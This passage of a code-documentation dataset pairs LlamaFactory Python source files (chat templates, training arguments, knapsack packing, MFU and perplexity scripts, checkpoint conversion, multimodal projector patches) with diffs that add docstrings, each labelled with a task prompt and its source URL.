+ r"""Convert slots to ollama template."""
slot_items = []
for slot in slots:
if isinstance(slot, str):
@@ -282,6 +302,7 @@ return "".join(slot_items)
def _get_ollama_template(self, tokenizer: "PreTrainedTokenizer") -> str:
+ r"""Return the ollama template."""
prefix = self._convert_slots_to_ollama(self.format_prefix.apply(), tokenizer)
system = self._convert_slots_to_ollama(self.format_system.apply(), tokenizer, placeholder=".System")
user = self._convert_slots_to_ollama(self.format_user.apply(), tokenizer, placeholder=".Content")
@@ -293,6 +314,10 @@ )
def get_ollama_modelfile(self, tokenizer: "PreTrainedTokenizer") -> str:
+ r"""Return the ollama modelfile.
+
+ TODO: support function calling.
+ """
modelfile = "# ollama modelfile auto-generated by llamafactory\n\n"
modelfile += f'FROM .\n\nTEMPLATE """{self._get_ollama_template(tokenizer)}"""\n\n'
@@ -308,6 +333,7 @@
@dataclass
class Llama2Template(Template):
+ r"""A template that fuse the system message to first user message."""
@override
def _encode(
@@ -377,6 +403,7 @@
@dataclass
class ReasoningTemplate(Template):
+ r"""A template that add thought to assistant message."""
@override
def encode_oneturn(
@@ -434,6 +461,7 @@
@dataclass
class Glm47ReasoningTemplate(ReasoningTemplate):
+ r"""GLM-4.7 uses only the closing </think> tag for empty thinking blocks."""
@override
def add_thought(self, content: str = "") -> str:
@@ -466,6 +494,26 @@ mm_plugin: "BasePlugin" = get_mm_plugin(name="base"),
template_class: type["Template"] = Template,
) -> None:
+ r"""Register a chat template.
+
+ To add the following chat template:
+ ```
+ <s><user>user prompt here
+ <model>model response here</s>
+ <user>user prompt here
+ <model>model response here</s>
+ ```
+
+ The corresponding code should be:
+ ```
+ register_template(
+ name="custom",
+ format_user=StringFormatter(slots=["<user>{{content}}\n<model>"]),
+ format_assistant=StringFormatter(slots=["{{content}}</s>\n"]),
+ format_prefix=EmptyFormatter("<s>"),
+ )
+ ```
+ """
if name in TEMPLATES:
raise ValueError(f"Template {name} already exists.")
@@ -500,6 +548,7 @@
def parse_template(tokenizer: "PreTrainedTokenizer") -> "Template":
+ r"""Extract a chat template from the tokenizer."""
def find_diff(short_str: str, long_str: str) -> str:
i, j = 0, 0
@@ -561,6 +610,7 @@
def get_template_and_fix_tokenizer(tokenizer: "PreTrainedTokenizer", data_args: "DataArguments") -> "Template":
+ r"""Get chat template and fixes the tokenizer."""
if data_args.template is None:
if isinstance(tokenizer.chat_template, str):
logger.warning_rank0("`template` was not specified, try parsing the chat template from the tokenizer.")
@@ -2221,4 +2271,4 @@ thought_words=("<think>", "</think>"),
efficient_eos=True,
template_class=Glm47ReasoningTemplate,
-)+)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/data/template.py |
Write docstrings for this repository | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from dataclasses import dataclass, field
from transformers import Seq2SeqTrainingArguments
from transformers.training_args import _convert_str_dict
from ..extras.misc import is_env_enabled, use_ray
from ..extras.packages import is_mcore_adapter_available
if is_env_enabled("USE_MCA"):
if not is_mcore_adapter_available():
raise ImportError(
"mcore_adapter is required when USE_MCA=1. Please install `mcore_adapter` and its dependencies."
)
from mcore_adapter import Seq2SeqTrainingArguments as McaSeq2SeqTrainingArguments
BaseTrainingArguments = McaSeq2SeqTrainingArguments
else:
BaseTrainingArguments = Seq2SeqTrainingArguments
@dataclass
class RayArguments:
ray_num_workers: int = field(
default=1,
metadata={"help": "The number of workers for Ray training. Default is 1 worker."},
)
ray_init_kwargs: dict | str | None = field(
default=None,
metadata={"help": "The arguments to pass to ray.init for Ray training. Default is None."},
)
master_addr: str | None = field(
default=None,
metadata={"help": "The master address for init_process_group"},
)
master_port: str | None = field(
default=None,
metadata={"help": "The master port for init_process_group"},
)
def __post_init__(self):
self.use_ray = use_ray()
if isinstance(self.ray_init_kwargs, str) and self.ray_init_kwargs.startswith("{"):
self.ray_init_kwargs = _convert_str_dict(json.loads(self.ray_init_kwargs))
@dataclass
class Fp8Arguments:
fp8: bool = field(
default=False,
metadata={
"help": "Enable FP8 mixed precision training via HuggingFace Accelerate. "
"Requires PyTorch 2.7+ and Hopper architecture GPUs."
},
)
fp8_backend: str = field(
default="auto",
metadata={
"help": "FP8 backend to use ('auto', 'torchao', 'te', 'msamp'). 'auto' selects best available backend."
},
)
fp8_enable_fsdp_float8_all_gather: bool = field(
default=False,
metadata={"help": "Enable FP8 optimizations for FSDP2 all-gather operations."},
)
@dataclass
class TrainingArguments(Fp8Arguments, RayArguments, BaseTrainingArguments):
overwrite_output_dir: bool = field(
default=False,
metadata={"help": "deprecated"},
)
def __post_init__(self):
RayArguments.__post_init__(self)
BaseTrainingArguments.__post_init__(self) | --- +++ @@ -37,6 +37,7 @@
@dataclass
class RayArguments:
+ r"""Arguments pertaining to the Ray training."""
ray_num_workers: int = field(
default=1,
@@ -64,6 +65,7 @@
@dataclass
class Fp8Arguments:
+ r"""Arguments pertaining to the FP8 training."""
fp8: bool = field(
default=False,
@@ -86,6 +88,7 @@
@dataclass
class TrainingArguments(Fp8Arguments, RayArguments, BaseTrainingArguments):
+ r"""Arguments pertaining to the trainer."""
overwrite_output_dir: bool = field(
default=False,
@@ -94,4 +97,4 @@
def __post_init__(self):
RayArguments.__post_init__(self)
- BaseTrainingArguments.__post_init__(self)+ BaseTrainingArguments.__post_init__(self)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/hparams/training_args.py |
Can you add docstrings to this Python file? | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import bisect
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import TYPE_CHECKING, Any, Optional
if TYPE_CHECKING:
from transformers import PreTrainedTokenizer, ProcessorMixin
from ...hparams import DataArguments
from ..template import Template
@dataclass
class DatasetProcessor(ABC):
template: "Template"
tokenizer: "PreTrainedTokenizer"
processor: Optional["ProcessorMixin"]
data_args: "DataArguments"
@abstractmethod
def preprocess_dataset(self, examples: dict[str, list[Any]]) -> dict[str, list[Any]]:
...
@abstractmethod
def print_data_example(self, example: dict[str, list[int]]) -> None:
...
def search_for_fit(numbers: list[int], capacity: int) -> int:
index = bisect.bisect(numbers, capacity)
return -1 if index == 0 else (index - 1)
def greedy_knapsack(numbers: list[int], capacity: int) -> list[list[int]]:
numbers.sort() # sort numbers in ascending order for binary search
knapsacks = []
while numbers:
current_knapsack = []
remaining_capacity = capacity
while True:
index = search_for_fit(numbers, remaining_capacity)
if index == -1:
break # no more numbers fit in this knapsack
remaining_capacity -= numbers[index] # update the remaining capacity
current_knapsack.append(numbers.pop(index)) # add the number to knapsack
knapsacks.append(current_knapsack)
return knapsacks
def infer_seqlen(source_len: int, target_len: int, cutoff_len: int) -> tuple[int, int]:
if target_len * 2 < cutoff_len: # truncate source
max_target_len = cutoff_len
elif source_len * 2 < cutoff_len: # truncate target
max_target_len = cutoff_len - source_len
else: # truncate both
max_target_len = int(cutoff_len * (target_len / (source_len + target_len)))
new_target_len = min(max_target_len, target_len)
max_source_len = max(cutoff_len - new_target_len, 0)
new_source_len = min(max_source_len, source_len)
return new_source_len, new_target_len | --- +++ @@ -27,6 +27,7 @@
@dataclass
class DatasetProcessor(ABC):
+ r"""A class for data processors."""
template: "Template"
tokenizer: "PreTrainedTokenizer"
@@ -35,19 +36,23 @@
@abstractmethod
def preprocess_dataset(self, examples: dict[str, list[Any]]) -> dict[str, list[Any]]:
+ r"""Build model inputs from the examples."""
...
@abstractmethod
def print_data_example(self, example: dict[str, list[int]]) -> None:
+ r"""Print a data example to stdout."""
...
def search_for_fit(numbers: list[int], capacity: int) -> int:
+ r"""Find the index of largest number that fits into the knapsack with the given capacity."""
index = bisect.bisect(numbers, capacity)
return -1 if index == 0 else (index - 1)
def greedy_knapsack(numbers: list[int], capacity: int) -> list[list[int]]:
+ r"""Implement efficient greedy algorithm with binary search for the knapsack problem."""
numbers.sort() # sort numbers in ascending order for binary search
knapsacks = []
@@ -69,6 +74,7 @@
def infer_seqlen(source_len: int, target_len: int, cutoff_len: int) -> tuple[int, int]:
+ r"""Compute the real sequence length after truncation by the cutoff_len."""
if target_len * 2 < cutoff_len: # truncate source
max_target_len = cutoff_len
elif source_len * 2 < cutoff_len: # truncate target
@@ -79,4 +85,4 @@ new_target_len = min(max_target_len, target_len)
max_source_len = max(cutoff_len - new_target_len, 0)
new_source_len = min(max_source_len, source_len)
- return new_source_len, new_target_len+ return new_source_len, new_target_len
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/data/processor/processor_utils.py |
Generate docstrings for each module | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import fire
import torch
import torch.distributed as dist
from transformers import AutoConfig
from llamafactory.train.tuner import run_exp
BASE = 2 # gemm (add + mul)
def compute_model_flops(
model_name_or_path: str,
total_batch_size: int,
seq_length: int,
include_backward: bool = True,
include_recompute: bool = False,
include_flashattn: bool = False,
) -> int:
config = AutoConfig.from_pretrained(model_name_or_path)
hidden_size = getattr(config, "hidden_size", None)
vocab_size = getattr(config, "vocab_size", None)
intermediate_size = getattr(config, "intermediate_size", None)
num_attention_heads = getattr(config, "num_attention_heads", None)
num_key_value_heads = getattr(config, "num_key_value_heads", None)
num_hidden_layers = getattr(config, "num_hidden_layers", None)
tie_word_embeddings = getattr(config, "tie_word_embeddings", False)
# mlp module
mlp_flops_per_token = 3 * BASE * hidden_size * intermediate_size # up, gate, down
mlp_flops = total_batch_size * seq_length * num_hidden_layers * mlp_flops_per_token
# attn projector module
q_flops_per_token = BASE * hidden_size * hidden_size
o_flops_per_token = BASE * hidden_size * hidden_size
k_flops_per_token = BASE * hidden_size * hidden_size * num_key_value_heads // num_attention_heads
v_flops_per_token = BASE * hidden_size * hidden_size * num_key_value_heads // num_attention_heads
attn_proj_flops_per_token = q_flops_per_token + o_flops_per_token + k_flops_per_token + v_flops_per_token
attn_proj_flops = total_batch_size * seq_length * num_hidden_layers * attn_proj_flops_per_token
# attn sdpa module
sdpa_flops_per_layer = 2 * BASE * hidden_size * seq_length * seq_length # (q * k^T) * v
sdpa_flops = total_batch_size * num_hidden_layers * sdpa_flops_per_layer
# embedding module
embedding_flops_per_token = hidden_size * vocab_size
embedding_flops = total_batch_size * seq_length * embedding_flops_per_token
if tie_word_embeddings is False:
embedding_flops *= 2
non_embedding_flops = mlp_flops + attn_proj_flops + sdpa_flops
non_embedding_coeff, embedding_coeff = 1, 1
if include_backward:
non_embedding_coeff += 2
embedding_coeff += 2
if include_recompute:
non_embedding_coeff += 1
total_flops = non_embedding_coeff * non_embedding_flops + embedding_coeff * embedding_flops
if include_flashattn:
total_flops += sdpa_flops
return total_flops
def compute_device_flops(world_size: int) -> float:
device_name = torch.cuda.get_device_name()
if "H100" in device_name or "H800" in device_name:
return 989 * 1e12 * world_size
elif "A100" in device_name or "A800" in device_name:
return 312 * 1e12 * world_size
elif "V100" in device_name:
return 125 * 1e12 * world_size
elif "4090" in device_name:
return 98 * 1e12 * world_size
else:
raise NotImplementedError(f"Device not supported: {device_name}.")
def calculate_mfu(
model_name_or_path: str,
batch_size: int = 1,
seq_length: int = 1024,
num_steps: int = 100,
finetuning_type: str = "lora",
flash_attn: str = "auto",
deepspeed_stage: int = 0,
disable_gc: bool = False,
liger_kernel: bool = False,
unsloth_gc: bool = False,
) -> float:
args = {
"model_name_or_path": model_name_or_path,
"flash_attn": flash_attn,
"disable_gradient_checkpointing": disable_gc,
"enable_liger_kernel": liger_kernel,
"use_unsloth_gc": unsloth_gc,
"stage": "pt",
"do_train": True,
"finetuning_type": finetuning_type,
"dataset": "c4_demo",
"cutoff_len": seq_length,
"output_dir": os.path.join("saves", "test_mfu"),
"logging_strategy": "no",
"save_strategy": "no",
"save_only_model": True,
"overwrite_output_dir": True,
"per_device_train_batch_size": batch_size,
"max_steps": num_steps,
"bf16": True,
}
if deepspeed_stage in [2, 3]:
args["deepspeed"] = f"examples/deepspeed/ds_z{deepspeed_stage}_config.json"
run_exp(args)
if dist.is_initialized():
dist.barrier()
world_size = dist.get_world_size()
else:
world_size = 1
if int(os.getenv("LOCAL_RANK", "0")) == 0:
with open(os.path.join("saves", "test_mfu", "all_results.json"), encoding="utf-8") as f:
result = json.load(f)
total_batch_size = batch_size * world_size
mfu_value = (
result["train_steps_per_second"]
* compute_model_flops(model_name_or_path, total_batch_size, seq_length)
/ compute_device_flops(world_size)
)
print(f"MFU: {mfu_value * 100:.2f}%")
if __name__ == "__main__":
fire.Fire(calculate_mfu) | --- +++ @@ -34,6 +34,7 @@ include_recompute: bool = False,
include_flashattn: bool = False,
) -> int:
+ r"""Calculate the FLOPs of model per forward/backward pass."""
config = AutoConfig.from_pretrained(model_name_or_path)
hidden_size = getattr(config, "hidden_size", None)
vocab_size = getattr(config, "vocab_size", None)
@@ -83,6 +84,7 @@
def compute_device_flops(world_size: int) -> float:
+ r"""Calculate the FLOPs of the device capability per second."""
device_name = torch.cuda.get_device_name()
if "H100" in device_name or "H800" in device_name:
return 989 * 1e12 * world_size
@@ -108,6 +110,10 @@ liger_kernel: bool = False,
unsloth_gc: bool = False,
) -> float:
+ r"""Calculate MFU for given model and hyper-params.
+
+ Usage: python cal_mfu.py --model_name_or_path path_to_model --batch_size 1 --seq_length 1024
+ """
args = {
"model_name_or_path": model_name_or_path,
"flash_attn": flash_attn,
@@ -152,4 +158,4 @@
if __name__ == "__main__":
- fire.Fire(calculate_mfu)+ fire.Fire(calculate_mfu)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/scripts/stat_utils/cal_mfu.py |
Add docstrings including usage examples | # Copyright 2025 the ROLL team and the LlamaFactory team.
#
# This code is modified from the ROLL library.
# https://github.com/alibaba/ROLL/blob/main/mcore_adapter/tools/convert.py
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import fire
import torch
from mcore_adapter.models.converter.post_converter import convert_checkpoint_to_hf, convert_checkpoint_to_mca
from mcore_adapter.training_args import DistributingParallelArguments
from mcore_adapter.utils import get_logger
from transformers import AutoConfig
logger = get_logger(__name__)
def convert_mca_to_hf(
checkpoint_path: str,
output_path: str = "./output",
bf16: bool = False,
fp16: bool = False,
convert_model_max_length: int | None = None,
):
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
torch_dtype = None
if bf16:
torch_dtype = torch.bfloat16
elif fp16:
torch_dtype = torch.float16
convert_checkpoint_to_hf(checkpoint_path, output_path, torch_dtype=torch_dtype)
if convert_model_max_length is not None:
config = AutoConfig.from_pretrained(output_path, trust_remote_code=True)
config.model_max_length = convert_model_max_length
config.save_pretrained(output_path)
def convert(
checkpoint_path: str,
output_path: str = "./output",
bf16: bool = False,
fp16: bool = False,
convert_model_max_length: int | None = None,
tensor_model_parallel_size: int = 1,
pipeline_model_parallel_size: int = 1,
expert_model_parallel_size: int = 1,
virtual_pipeline_model_parallel_size: int | None = None,
moe_grouped_gemm: bool | None = None,
):
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
mca_config_path = os.path.join(checkpoint_path, "mca_config.json")
from_mca = os.path.exists(mca_config_path)
if not from_mca:
dist_args = DistributingParallelArguments(
tensor_model_parallel_size=tensor_model_parallel_size,
pipeline_model_parallel_size=pipeline_model_parallel_size,
expert_model_parallel_size=expert_model_parallel_size,
virtual_pipeline_model_parallel_size=virtual_pipeline_model_parallel_size,
moe_grouped_gemm=moe_grouped_gemm,
transformer_impl="transformer_engine", # hard code here since we default using te for training
)
convert_checkpoint_to_mca(
checkpoint_path,
output_path,
dist_args,
bf16=bf16,
fp16=fp16,
)
else:
convert_mca_to_hf(
checkpoint_path=checkpoint_path,
output_path=output_path,
bf16=bf16,
fp16=fp16,
convert_model_max_length=convert_model_max_length,
)
def main():
fire.Fire(convert)
if __name__ == "__main__":
main() | --- +++ @@ -35,6 +35,15 @@ fp16: bool = False,
convert_model_max_length: int | None = None,
):
+ """Convert megatron checkpoint to HuggingFace format.
+
+ Args:
+ checkpoint_path: Path to the checkpoint to convert
+ output_path: Path to save the converted checkpoint
+ bf16: Use bfloat16 precision
+ fp16: Use float16 precision
+ convert_model_max_length: Change the model_max_length in hf config.json
+ """
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
@@ -64,6 +73,23 @@ virtual_pipeline_model_parallel_size: int | None = None,
moe_grouped_gemm: bool | None = None,
):
+ """Convert checkpoint between MCA and HuggingFace formats.
+
+ Args:
+ checkpoint_path: Path to the checkpoint to convert
+ output_path: Path to save the converted checkpoint
+ bf16: Use bfloat16 precision
+ fp16: Use float16 precision
+ convert_model_max_length: Change the model_max_length in hf config.json
+ tensor_model_parallel_size: Tensor model parallel size
+ pipeline_model_parallel_size: Pipeline model parallel size
+ expert_model_parallel_size: Expert model parallel size
+ virtual_pipeline_model_parallel_size: Virtual pipeline model parallel size
+ moe_grouped_gemm: Use grouped gemm for MoE experts. When enabled, expert
+ weights are stored in a flattened format (linear_fc1.weight0, weight1, ...)
+ rather than per-expert format (local_experts.0.linear_fc1.weight, ...).
+ Must match the format used when saving the checkpoint.
+ """
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
@@ -101,4 +127,4 @@
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/scripts/megatron_merge.py |
Add detailed docstrings explaining each function | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from dataclasses import dataclass
from typing import Any, Literal
import fire
import torch
from torch.utils.data import DataLoader
from tqdm import tqdm
from transformers import DataCollatorForLanguageModeling
from llamafactory.data import MultiModalDataCollatorForSeq2Seq, get_dataset, get_template_and_fix_tokenizer
from llamafactory.extras.constants import IGNORE_INDEX
from llamafactory.hparams import get_train_args
from llamafactory.model import load_model, load_tokenizer
@dataclass
class PairwiseDataCollatorWithPadding(MultiModalDataCollatorForSeq2Seq):
train_on_prompt: bool = False
def __call__(self, features: list[dict[str, Any]]) -> dict[str, torch.Tensor]:
chosen_features = []
for feature in features:
chosen_features.append(
{
"input_ids": feature["chosen_input_ids"],
"attention_mask": feature["chosen_attention_mask"],
"labels": feature["chosen_input_ids"] if self.train_on_prompt else feature["chosen_labels"],
"images": feature["images"],
"videos": feature["videos"],
"audios": feature["audios"],
}
)
return super().__call__(chosen_features)
def calculate_ppl(
model_name_or_path: str,
save_name: str = "ppl.json",
batch_size: int = 4,
stage: Literal["pt", "sft", "rm"] = "sft",
dataset: str = "alpaca_en_demo",
dataset_dir: str = "data",
template: str = "default",
cutoff_len: int = 2048,
max_samples: int | None = None,
train_on_prompt: bool = False,
):
model_args, data_args, training_args, finetuning_args, _ = get_train_args(
dict(
stage=stage,
model_name_or_path=model_name_or_path,
dataset=dataset,
dataset_dir=dataset_dir,
template=template,
cutoff_len=cutoff_len,
max_samples=max_samples,
train_on_prompt=train_on_prompt,
preprocessing_num_workers=16,
output_dir="dummy_dir",
overwrite_cache=True,
do_train=True,
)
)
tokenizer_module = load_tokenizer(model_args)
tokenizer = tokenizer_module["tokenizer"]
template = get_template_and_fix_tokenizer(tokenizer, data_args)
trainset = get_dataset(template, model_args, data_args, training_args, stage, **tokenizer_module)["train_dataset"]
model = load_model(tokenizer, model_args, finetuning_args, is_trainable=False)
if stage == "pt":
data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm=False)
elif stage == "sft":
data_collator = MultiModalDataCollatorForSeq2Seq(
template=template, tokenizer=tokenizer, label_pad_token_id=IGNORE_INDEX
)
elif stage == "rm":
data_collator = PairwiseDataCollatorWithPadding(
template=template, tokenizer=tokenizer, label_pad_token_id=IGNORE_INDEX, train_on_prompt=train_on_prompt
)
else:
raise NotImplementedError(f"Stage does not supported: {stage}.")
dataloader = DataLoader(trainset, batch_size, shuffle=False, collate_fn=data_collator, pin_memory=True)
criterion = torch.nn.CrossEntropyLoss(reduction="none")
total_ppl = 0
perplexities = []
batch: dict[str, torch.Tensor]
with torch.no_grad():
for batch in tqdm(dataloader, desc="Computing perplexities"):
batch = batch.to(model.device)
outputs = model(**batch)
shift_logits: torch.Tensor = outputs["logits"][..., :-1, :]
shift_labels: torch.Tensor = batch["labels"][..., 1:]
loss_mask = shift_labels != IGNORE_INDEX
flatten_logits = shift_logits.contiguous().view(shift_labels.size(0) * shift_labels.size(1), -1)
flatten_labels = shift_labels.contiguous().view(-1)
token_logps: torch.Tensor = criterion(flatten_logits, flatten_labels)
token_logps = token_logps.contiguous().view(shift_logits.size(0), -1)
sentence_logps = (token_logps * loss_mask).sum(-1) / loss_mask.sum(-1)
total_ppl += sentence_logps.exp().sum().item()
perplexities.extend(sentence_logps.exp().tolist())
with open(save_name, "w", encoding="utf-8") as f:
json.dump(perplexities, f, indent=2)
print(f"Average perplexity is {total_ppl / len(perplexities):.2f}")
print(f"Perplexities have been saved at {save_name}.")
if __name__ == "__main__":
fire.Fire(calculate_ppl) | --- +++ @@ -30,10 +30,12 @@
@dataclass
class PairwiseDataCollatorWithPadding(MultiModalDataCollatorForSeq2Seq):
+ r"""Data collator for pairwise data."""
train_on_prompt: bool = False
def __call__(self, features: list[dict[str, Any]]) -> dict[str, torch.Tensor]:
+ r"""Pad batched data to the longest sequence in the batch."""
chosen_features = []
for feature in features:
chosen_features.append(
@@ -62,6 +64,11 @@ max_samples: int | None = None,
train_on_prompt: bool = False,
):
+ r"""Calculate the ppl on the dataset of the pre-trained models.
+
+ Usage: export CUDA_VISIBLE_DEVICES=0
+ python cal_ppl.py --model_name_or_path path_to_model --dataset alpaca_en_demo --save_name ppl.json
+ """
model_args, data_args, training_args, finetuning_args, _ = get_train_args(
dict(
stage=stage,
@@ -124,4 +131,4 @@
if __name__ == "__main__":
- fire.Fire(calculate_ppl)+ fire.Fire(calculate_ppl)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/scripts/stat_utils/cal_ppl.py |
Write docstrings for utility functions | # Copyright 2025 HuggingFace Inc. and the LlamaFactory team.
#
# This code is inspired by the HuggingFace's Transformers library.
# https://github.com/huggingface/transformers/blob/v4.40.0/src/transformers/models/llava/modeling_llava.py
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import TYPE_CHECKING, Optional
import torch
import transformers
import transformers.models
from transformers.activations import ACT2FN
from ...extras import logging
from ...extras.packages import is_transformers_version_greater_than
if TYPE_CHECKING:
from transformers import LlavaConfig, PretrainedConfig, PreTrainedModel
from ...hparams import FinetuningArguments, ModelArguments
logger = logging.get_logger(__name__)
transformers_logger = transformers.utils.logging.get_logger(__name__)
@dataclass
class CompositeModel:
model_type: str
projector_key: str
vision_model_keys: list[str]
language_model_keys: list[str]
lora_conflict_keys: list[str]
def get_projector(self, module: "torch.nn.Module") -> "torch.nn.Module":
for key in self.projector_key.split("."):
module = getattr(module, key)
return module
COMPOSITE_MODELS: dict[str, "CompositeModel"] = {}
def _register_composite_model(
model_type: str,
projector_key: Optional[str] = None,
vision_model_keys: Optional[list[str]] = None,
language_model_keys: Optional[list[str]] = None,
lora_conflict_keys: Optional[list[str]] = None,
):
COMPOSITE_MODELS[model_type] = CompositeModel(
model_type=model_type,
projector_key=projector_key or "multi_modal_projector",
vision_model_keys=vision_model_keys or ["vision_tower"],
language_model_keys=language_model_keys or ["language_model", "lm_head"],
lora_conflict_keys=lora_conflict_keys or [],
)
class LlavaMultiModalProjectorForYiVL(torch.nn.Module):
def __init__(self, config: "LlavaConfig") -> None:
super().__init__()
self.config = config
if config is None:
return
self.linear_1 = torch.nn.Linear(config.vision_config.hidden_size, config.text_config.hidden_size, bias=True)
self.linear_2 = torch.nn.LayerNorm(config.text_config.hidden_size, bias=True)
self.linear_3 = torch.nn.Linear(config.text_config.hidden_size, config.text_config.hidden_size, bias=True)
self.linear_4 = torch.nn.LayerNorm(config.text_config.hidden_size, bias=True)
self.act = ACT2FN[config.projector_hidden_act]
def forward(self, image_features: "torch.Tensor") -> "torch.Tensor":
hidden_states = self.linear_1(image_features)
hidden_states = self.linear_2(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.linear_3(hidden_states)
hidden_states = self.linear_4(hidden_states)
if hidden_states.dtype == torch.float32:
if torch.is_autocast_enabled():
target_dtype = torch.get_autocast_gpu_dtype()
elif hasattr(self.config, "_pre_quantization_dtype"):
target_dtype = self.config._pre_quantization_dtype
else:
target_dtype = self.linear_1.weight.dtype
transformers_logger.warning_once("The hidden states seems to be silently casted in float32.")
hidden_states = hidden_states.to(target_dtype)
return hidden_states
class LlavaMultiModalProjectorForYiVLForVLLM(LlavaMultiModalProjectorForYiVL):
def __init__(self, vision_hidden_size: int, text_hidden_size: int, projector_hidden_act: str) -> None:
super().__init__(config=None)
self.linear_1 = torch.nn.Linear(vision_hidden_size, text_hidden_size, bias=True)
self.linear_2 = torch.nn.LayerNorm(text_hidden_size, bias=True)
self.linear_3 = torch.nn.Linear(text_hidden_size, text_hidden_size, bias=True)
self.linear_4 = torch.nn.LayerNorm(text_hidden_size, bias=True)
self.act = ACT2FN[projector_hidden_act]
def autocast_projector_dtype(model: "PreTrainedModel", model_args: "ModelArguments") -> None:
def _mm_projector_forward_post_hook(
module: "torch.nn.Module", args: tuple["torch.Tensor"], output: "torch.Tensor"
) -> "torch.Tensor":
return output.to(model_args.compute_dtype)
if getattr(model, "quantization_method", None):
model_type = getattr(model.config, "model_type", None)
if model_type in COMPOSITE_MODELS:
mm_projector = COMPOSITE_MODELS[model_type].get_projector(model)
else:
return
logger.info_rank0(f"Casting multimodal projector outputs in {model_args.compute_dtype}.")
mm_projector.register_forward_hook(_mm_projector_forward_post_hook)
def configure_visual_model(config: "PretrainedConfig") -> None:
if getattr(config, "text_config", None) and not getattr(config, "hidden_size", None):
# required for ds zero3 and valuehead models
setattr(config, "hidden_size", getattr(config.text_config, "hidden_size", None))
if getattr(config, "is_yi_vl_derived_model", None):
logger.info_rank0("Detected Yi-VL model, applying projector patch.")
transformers.models.llava.modeling_llava.LlavaMultiModalProjector = LlavaMultiModalProjectorForYiVL
def get_forbidden_modules(config: "PretrainedConfig", finetuning_args: "FinetuningArguments") -> set[str]:
model_type = getattr(config, "model_type", None)
forbidden_modules = set()
if model_type in COMPOSITE_MODELS:
if finetuning_args.freeze_vision_tower:
vision_model_keys = COMPOSITE_MODELS[model_type].vision_model_keys
logger.info_rank0(f"Set vision model not trainable: {vision_model_keys}.")
forbidden_modules.update(vision_model_keys)
if finetuning_args.freeze_multi_modal_projector:
projector_key = COMPOSITE_MODELS[model_type].projector_key
logger.info_rank0(f"Set multi model projector not trainable: {projector_key}.")
forbidden_modules.add(projector_key)
if finetuning_args.freeze_language_model:
language_model_keys = COMPOSITE_MODELS[model_type].language_model_keys
logger.info_rank0(f"Set language model not trainable: {language_model_keys}.")
forbidden_modules.update(language_model_keys)
return forbidden_modules
def patch_target_modules(
model: "PreTrainedModel", finetuning_args: "FinetuningArguments", target_modules: list[str]
) -> list[str]:
model_type = getattr(model.config, "model_type", None)
if model_type in COMPOSITE_MODELS:
forbidden_modules = get_forbidden_modules(model.config, finetuning_args)
forbidden_modules.update(COMPOSITE_MODELS[model_type].lora_conflict_keys)
module_names = []
for name, _ in model.named_modules():
if any(target_module in name for target_module in target_modules) and not any(
forbidden_module in name for forbidden_module in forbidden_modules
):
module_names.append(name)
return module_names
else:
return target_modules
_register_composite_model(
model_type="dots_ocr",
projector_key="vision_tower.merger",
vision_model_keys=["vision_tower"],
language_model_keys=["model", "lm_head"],
lora_conflict_keys=["merger"],
)
_register_composite_model(
model_type="gemma3",
)
_register_composite_model(
model_type="gemma3n",
vision_model_keys=["vision_tower", "audio_tower"],
